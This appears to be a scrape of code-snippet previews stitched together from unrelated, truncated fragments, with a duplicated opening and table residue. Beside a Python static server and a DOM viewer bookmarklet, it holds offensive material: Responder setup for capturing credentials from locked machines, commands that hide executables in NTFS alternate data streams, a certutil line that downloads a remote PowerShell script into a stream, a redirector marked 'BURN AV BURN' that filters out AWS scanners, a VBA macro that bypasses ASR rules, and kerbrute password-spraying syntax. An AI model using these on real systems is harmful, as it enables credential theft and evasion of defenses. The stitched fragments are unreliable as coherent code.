Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
from ctypes import * | |
from ctypes.wintypes import * | |
import winreg | |
NTSTATUS = c_long | |
PVOID = c_void_p | |
PWSTR = c_wchar_p | |
OBJ_CASE_INSENSITIVE = 0x00000040 |
##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/. | |
##Installation on Rasberry Pi Zero | |
##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/ | |
##Use Pi Filler and write image to MicroSD | |
##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget to let the Raspberry Pi Zero device emulates as a USB NIC | |
$ cd /pentest | |
$ apt-get install -y python git python-pip python-dev screen sqlite3 | |
$ pip install pycrypto | |
$ git clone https://github.com/lgandx/Responder |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
RewriteEngine On | |
# Uncomment the below line for verbose logging, including seeing which rule matched. | |
#LogLevel alert rewrite:trace5 | |
# BURN AV BURN | |
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
RewriteCond expr "-R '52.0.0.0/8'" [OR] |
' ASR rules bypass creating child processes | |
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
Sub ASR_blocked() | |
Dim WSHShell As Object | |
Set WSHShell = CreateObject("Wscript.Shell") | |
WSHShell.Run "cmd.exe" | |
End Sub |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
// 3D Dom viewer, copy-paste this into your console to visualise the DOM as a stack of solid blocks. | |
// You can also minify and save it as a bookmarklet (https://www.freecodecamp.org/news/what-are-bookmarklets/) | |
(() => { | |
const SHOW_SIDES = false; // color sides of DOM nodes? | |
const COLOR_SURFACE = true; // color tops of DOM nodes? | |
const COLOR_RANDOM = false; // randomise color? | |
const COLOR_HUE = 190; // hue in HSL (https://hslpicker.com) | |
const MAX_ROTATION = 180; // set to 360 to rotate all the way round | |
const THICKNESS = 20; // thickness of layers | |
const DISTANCE = 10000; // ¯\\_(ツ)_/¯ |